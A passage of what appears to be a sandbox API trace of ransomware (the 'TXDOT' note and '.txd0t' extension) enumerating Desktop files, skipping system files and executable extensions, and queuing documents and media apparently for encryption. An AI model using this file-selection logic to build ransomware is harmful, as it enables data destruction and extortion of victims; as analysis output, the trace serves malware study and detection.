ftLastWriteTime.dwLowDateTime=0x7729f3c0, ftLastWriteTime.dwHighDateTime=0x1d5e1a1, nFileSizeHigh=0x0, nFileSizeLow=0x5cc8, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="yGjZ.rtf", cAlternateFileName="")) returned 1 [0073.799] StrCmpW (psz1="yGjZ.rtf", psz2=".") returned 1 [0073.799] StrCmpW (psz1="yGjZ.rtf", psz2="..") returned 1 [0073.799] StrCpyNW (in: psz1=0xed36a8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0073.799] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0073.799] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="yGjZ.rtf", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf" [0073.799] PathFindExtensionW (pszPath="yGjZ.rtf") returned=".rtf" [0073.800] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0073.800] StrCmpIW (psz1="yGjZ.rtf", psz2="bootsect.bak") returned 1 [0073.800] StrCmpIW (psz1="yGjZ.rtf", psz2="iconcache.db") returned 1 [0073.800] StrCmpIW (psz1="yGjZ.rtf", psz2="thumbs.db") returned 1 [0073.800] StrCmpIW (psz1="yGjZ.rtf", psz2=" ransomware ") returned 1 [0073.800] StrCmpIW (psz1="yGjZ.rtf", psz2=" ransom ") returned 1 [0073.800] StrCmpIW (psz1="yGjZ.rtf", psz2="debug.txt") returned 1 [0073.800] StrCmpIW (psz1="yGjZ.rtf", psz2="boot.ini") returned 1 [0073.800] StrCmpIW (psz1="yGjZ.rtf", psz2="desktop.ini") returned 1 [0073.800] StrCmpIW (psz1="yGjZ.rtf", psz2="autorun.inf") returned 1 [0073.800] StrCmpIW (psz1="yGjZ.rtf", psz2="ntuser.dat") returned 1 [0073.800] StrCmpIW (psz1="yGjZ.rtf", psz2="ntldr") returned 1 [0073.800] StrCmpIW (psz1="yGjZ.rtf", psz2="ntdetect.com") returned 1 [0073.800] StrCmpIW (psz1="yGjZ.rtf", psz2="bootfont.bin") returned 1 [0073.800] StrCmpIW (psz1="yGjZ.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.800] PathFindExtensionW (pszPath="yGjZ.rtf") returned=".rtf" [0073.800] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0073.800] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0073.800] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0073.800] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0073.807] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.807] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf" [0073.807] SetEvent (hEvent=0x418) returned 1 [0073.807] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73a938d0, ftCreationTime.dwHighDateTime=0x1d5f044, ftLastAccessTime.dwLowDateTime=0xab35d760, ftLastAccessTime.dwHighDateTime=0x1d5e37c, ftLastWriteTime.dwLowDateTime=0xab35d760, ftLastWriteTime.dwHighDateTime=0x1d5e37c, nFileSizeHigh=0x0, nFileSizeLow=0x1464c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="yKYlr_viA.odt", cAlternateFileName="YKYLR_~1.ODT")) returned 1 [0073.807] StrCmpW (psz1="yKYlr_viA.odt", psz2=".") returned 1 [0073.807] StrCmpW (psz1="yKYlr_viA.odt", psz2="..") returned 1 [0073.807] StrCpyNW (in: psz1=0xed36a8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0073.807] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0073.807] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="yKYlr_viA.odt", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt" [0073.807] PathFindExtensionW (pszPath="yKYlr_viA.odt") returned=".odt" [0073.807] StrCmpW (psz1=".odt", psz2=".txd0t") returned -1 [0073.807] StrCmpIW (psz1="yKYlr_viA.odt", psz2="bootsect.bak") returned 1 [0073.807] StrCmpIW (psz1="yKYlr_viA.odt", psz2="iconcache.db") returned 1 [0073.807] StrCmpIW (psz1="yKYlr_viA.odt", psz2="thumbs.db") returned 1 [0073.807] StrCmpIW (psz1="yKYlr_viA.odt", psz2=" ransomware ") returned 1 [0073.807] StrCmpIW (psz1="yKYlr_viA.odt", psz2=" ransom ") returned 1 [0073.807] StrCmpIW (psz1="yKYlr_viA.odt", psz2="debug.txt") returned 1 [0073.807] StrCmpIW (psz1="yKYlr_viA.odt", psz2="boot.ini") returned 1 [0073.807] StrCmpIW (psz1="yKYlr_viA.odt", psz2="desktop.ini") returned 1 [0073.807] StrCmpIW (psz1="yKYlr_viA.odt", psz2="autorun.inf") returned 1 [0073.807] StrCmpIW (psz1="yKYlr_viA.odt", psz2="ntuser.dat") returned 1 [0073.807] StrCmpIW (psz1="yKYlr_viA.odt", psz2="ntldr") returned 1 [0073.807] StrCmpIW (psz1="yKYlr_viA.odt", psz2="ntdetect.com") returned 1 [0073.807] StrCmpIW (psz1="yKYlr_viA.odt", psz2="bootfont.bin") returned 1 [0073.807] StrCmpIW (psz1="yKYlr_viA.odt", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.807] PathFindExtensionW (pszPath="yKYlr_viA.odt") returned=".odt" [0073.807] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".odt") returned 0x0 [0073.808] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0073.808] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0073.808] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0073.815] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.815] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt" [0073.815] SetEvent (hEvent=0x410) returned 1 [0073.815] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73a938d0, ftCreationTime.dwHighDateTime=0x1d5f044, ftLastAccessTime.dwLowDateTime=0xab35d760, ftLastAccessTime.dwHighDateTime=0x1d5e37c, ftLastWriteTime.dwLowDateTime=0xab35d760, ftLastWriteTime.dwHighDateTime=0x1d5e37c, nFileSizeHigh=0x0, nFileSizeLow=0x1464c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="yKYlr_viA.odt", cAlternateFileName="YKYLR_~1.ODT")) returned 0 [0073.815] FindClose (in: hFindFile=0xec25f0 | out: hFindFile=0xec25f0) returned 1 [0073.815] GetProcessHeap () returned 0xe30000 [0073.815] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed36a8 | out: hHeap=0xe30000) returned 1 [0073.816] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c24360, ftCreationTime.dwHighDateTime=0x1d5eda4, ftLastAccessTime.dwLowDateTime=0xd1e421a0, ftLastAccessTime.dwHighDateTime=0x1d5e5e8, ftLastWriteTime.dwLowDateTime=0xd1e421a0, ftLastWriteTime.dwHighDateTime=0x1d5e5e8, nFileSizeHigh=0x0, nFileSizeLow=0x12b6c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="tCY_wfmFOaMzCGVNZFEd.m4a", cAlternateFileName="TCY_WF~1.M4A")) returned 1 [0073.816] StrCmpW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a", psz2=".") returned 1 [0073.816] StrCmpW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a", psz2="..") returned 1 [0073.816] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0073.816] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0073.816] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="tCY_wfmFOaMzCGVNZFEd.m4a", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a") returned="C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a" [0073.816] PathFindExtensionW (pszPath="tCY_wfmFOaMzCGVNZFEd.m4a") returned=".m4a" [0073.816] StrCmpW (psz1=".m4a", psz2=".txd0t") returned -1 [0073.816] StrCmpIW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a", psz2="bootsect.bak") returned 1 [0073.816] StrCmpIW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a", psz2="iconcache.db") returned 1 [0073.816] StrCmpIW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a", psz2="thumbs.db") returned -1 [0073.816] StrCmpIW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a", psz2=" ransomware ") returned 1 [0073.816] StrCmpIW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a", psz2=" ransom ") returned 1 [0073.816] StrCmpIW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a", psz2="debug.txt") returned 1 [0073.816] StrCmpIW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a", psz2="boot.ini") returned 1 [0073.816] StrCmpIW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a", psz2="desktop.ini") returned 1 [0073.816] StrCmpIW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a", psz2="autorun.inf") returned 1 [0073.816] StrCmpIW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a", psz2="ntuser.dat") returned 1 [0073.816] StrCmpIW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a", psz2="ntldr") returned 1 [0073.816] StrCmpIW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a", psz2="ntdetect.com") returned 1 [0073.816] StrCmpIW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a", psz2="bootfont.bin") returned 1 [0073.816] StrCmpIW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.816] PathFindExtensionW (pszPath="tCY_wfmFOaMzCGVNZFEd.m4a") returned=".m4a" [0073.816] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".m4a") returned 0x0 [0073.816] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.816] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.816] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0073.824] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.825] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a" [0073.825] SetEvent (hEvent=0x418) returned 1 [0073.825] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa00db610, ftCreationTime.dwHighDateTime=0x1d5f00a, ftLastAccessTime.dwLowDateTime=0x1f58d860, ftLastAccessTime.dwHighDateTime=0x1d5e5e7, ftLastWriteTime.dwLowDateTime=0x1f58d860, ftLastWriteTime.dwHighDateTime=0x1d5e5e7, nFileSizeHigh=0x0, nFileSizeLow=0xf498, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="TLtL7FqQ6HKzRKYgMVx.mp3", cAlternateFileName="TLTL7F~1.MP3")) returned 1 [0073.825] StrCmpW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3", psz2=".") returned 1 [0073.825] StrCmpW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3", psz2="..") returned 1 [0073.825] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0073.825] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0073.825] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="TLtL7FqQ6HKzRKYgMVx.mp3", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3") returned="C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3" [0073.825] PathFindExtensionW (pszPath="TLtL7FqQ6HKzRKYgMVx.mp3") returned=".mp3" [0073.825] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0073.825] StrCmpIW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3", psz2="bootsect.bak") returned 1 [0073.825] StrCmpIW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3", psz2="iconcache.db") returned 1 [0073.825] StrCmpIW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3", psz2="thumbs.db") returned 1 [0073.825] StrCmpIW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3", psz2=" ransomware ") returned 1 [0073.825] StrCmpIW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3", psz2=" ransom ") returned 1 [0073.825] StrCmpIW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3", psz2="debug.txt") returned 1 [0073.825] StrCmpIW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3", psz2="boot.ini") returned 1 [0073.825] StrCmpIW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3", psz2="desktop.ini") returned 1 [0073.825] StrCmpIW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3", psz2="autorun.inf") returned 1 [0073.825] StrCmpIW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3", psz2="ntuser.dat") returned 1 [0073.825] StrCmpIW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3", psz2="ntldr") returned 1 [0073.825] StrCmpIW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3", psz2="ntdetect.com") returned 1 [0073.825] StrCmpIW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3", psz2="bootfont.bin") returned 1 [0073.825] StrCmpIW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.825] PathFindExtensionW (pszPath="TLtL7FqQ6HKzRKYgMVx.mp3") returned=".mp3" [0073.825] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0073.825] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.825] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.825] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0073.836] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.837] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3" [0073.837] SetEvent (hEvent=0x410) returned 1 [0073.837] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506c6ac0, ftCreationTime.dwHighDateTime=0x1d5ea0b, ftLastAccessTime.dwLowDateTime=0x59cb56b0, ftLastAccessTime.dwHighDateTime=0x1d5e210, ftLastWriteTime.dwLowDateTime=0x59cb56b0, ftLastWriteTime.dwHighDateTime=0x1d5e210, nFileSizeHigh=0x0, nFileSizeLow=0x9aac, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="tpWq0W7bdVW50sRvURB.ods", cAlternateFileName="TPWQ0W~1.ODS")) returned 1 [0073.837] StrCmpW (psz1="tpWq0W7bdVW50sRvURB.ods", psz2=".") returned 1 [0073.837] StrCmpW (psz1="tpWq0W7bdVW50sRvURB.ods", psz2="..") returned 1 [0073.837] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0073.837] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0073.837] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="tpWq0W7bdVW50sRvURB.ods", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods") returned="C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods" [0073.837] PathFindExtensionW (pszPath="tpWq0W7bdVW50sRvURB.ods") returned=".ods" [0073.837] StrCmpW (psz1=".ods", psz2=".txd0t") returned -1 [0073.837] StrCmpIW (psz1="tpWq0W7bdVW50sRvURB.ods", psz2="bootsect.bak") returned 1 [0073.837] StrCmpIW (psz1="tpWq0W7bdVW50sRvURB.ods", psz2="iconcache.db") returned 1 [0073.837] StrCmpIW (psz1="tpWq0W7bdVW50sRvURB.ods", psz2="thumbs.db") returned 1 [0073.837] StrCmpIW (psz1="tpWq0W7bdVW50sRvURB.ods", psz2=" ransomware ") returned 1 [0073.837] StrCmpIW (psz1="tpWq0W7bdVW50sRvURB.ods", psz2=" ransom ") returned 1 [0073.838] StrCmpIW (psz1="tpWq0W7bdVW50sRvURB.ods", psz2="debug.txt") returned 1 [0073.838] StrCmpIW (psz1="tpWq0W7bdVW50sRvURB.ods", psz2="boot.ini") returned 1 [0073.838] StrCmpIW (psz1="tpWq0W7bdVW50sRvURB.ods", psz2="desktop.ini") returned 1 [0073.838] StrCmpIW (psz1="tpWq0W7bdVW50sRvURB.ods", psz2="autorun.inf") returned 1 [0073.838] StrCmpIW (psz1="tpWq0W7bdVW50sRvURB.ods", psz2="ntuser.dat") returned 1 [0073.838] StrCmpIW (psz1="tpWq0W7bdVW50sRvURB.ods", psz2="ntldr") returned 1 [0073.838] StrCmpIW (psz1="tpWq0W7bdVW50sRvURB.ods", psz2="ntdetect.com") returned 1 [0073.838] StrCmpIW (psz1="tpWq0W7bdVW50sRvURB.ods", psz2="bootfont.bin") returned 1 [0073.838] StrCmpIW (psz1="tpWq0W7bdVW50sRvURB.ods", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.838] PathFindExtensionW (pszPath="tpWq0W7bdVW50sRvURB.ods") returned=".ods" [0073.838] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ods") returned 0x0 [0073.838] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.838] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.838] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0073.845] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.845] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods" [0073.845] SetEvent (hEvent=0x418) returned 1 [0073.845] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27a643a0, ftCreationTime.dwHighDateTime=0x1d5ebea, ftLastAccessTime.dwLowDateTime=0xe444740, ftLastAccessTime.dwHighDateTime=0x1d5e514, ftLastWriteTime.dwLowDateTime=0xe444740, ftLastWriteTime.dwHighDateTime=0x1d5e514, nFileSizeHigh=0x0, nFileSizeLow=0x17620, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="VCbe_Sa0NEidgDcyfgFz.flv", cAlternateFileName="VCBE_S~1.FLV")) returned 1 [0073.845] StrCmpW (psz1="VCbe_Sa0NEidgDcyfgFz.flv", psz2=".") returned 1 [0073.845] StrCmpW (psz1="VCbe_Sa0NEidgDcyfgFz.flv", psz2="..") returned 1 [0073.845] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0073.845] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0073.845] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="VCbe_Sa0NEidgDcyfgFz.flv", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv") returned="C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv" [0073.845] PathFindExtensionW (pszPath="VCbe_Sa0NEidgDcyfgFz.flv") returned=".flv" [0073.845] StrCmpW (psz1=".flv", psz2=".txd0t") returned -1 [0073.846] StrCmpIW (psz1="VCbe_Sa0NEidgDcyfgFz.flv", psz2="bootsect.bak") returned 1 [0073.846] StrCmpIW (psz1="VCbe_Sa0NEidgDcyfgFz.flv", psz2="iconcache.db") returned 1 [0073.846] StrCmpIW (psz1="VCbe_Sa0NEidgDcyfgFz.flv", psz2="thumbs.db") returned 1 [0073.846] StrCmpIW (psz1="VCbe_Sa0NEidgDcyfgFz.flv", psz2=" ransomware ") returned 1 [0073.846] StrCmpIW (psz1="VCbe_Sa0NEidgDcyfgFz.flv", psz2=" ransom ") returned 1 [0073.846] StrCmpIW (psz1="VCbe_Sa0NEidgDcyfgFz.flv", psz2="debug.txt") returned 1 [0073.846] StrCmpIW (psz1="VCbe_Sa0NEidgDcyfgFz.flv", psz2="boot.ini") returned 1 [0073.846] StrCmpIW (psz1="VCbe_Sa0NEidgDcyfgFz.flv", psz2="desktop.ini") returned 1 [0073.846] StrCmpIW (psz1="VCbe_Sa0NEidgDcyfgFz.flv", psz2="autorun.inf") returned 1 [0073.846] StrCmpIW (psz1="VCbe_Sa0NEidgDcyfgFz.flv", psz2="ntuser.dat") returned 1 [0073.846] StrCmpIW (psz1="VCbe_Sa0NEidgDcyfgFz.flv", psz2="ntldr") returned 1 [0073.846] StrCmpIW (psz1="VCbe_Sa0NEidgDcyfgFz.flv", psz2="ntdetect.com") returned 1 [0073.846] StrCmpIW (psz1="VCbe_Sa0NEidgDcyfgFz.flv", psz2="bootfont.bin") returned 1 [0073.846] StrCmpIW (psz1="VCbe_Sa0NEidgDcyfgFz.flv", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.846] PathFindExtensionW (pszPath="VCbe_Sa0NEidgDcyfgFz.flv") returned=".flv" [0073.846] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".flv") returned 0x0 [0073.846] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.846] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.846] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0073.859] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.859] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv") 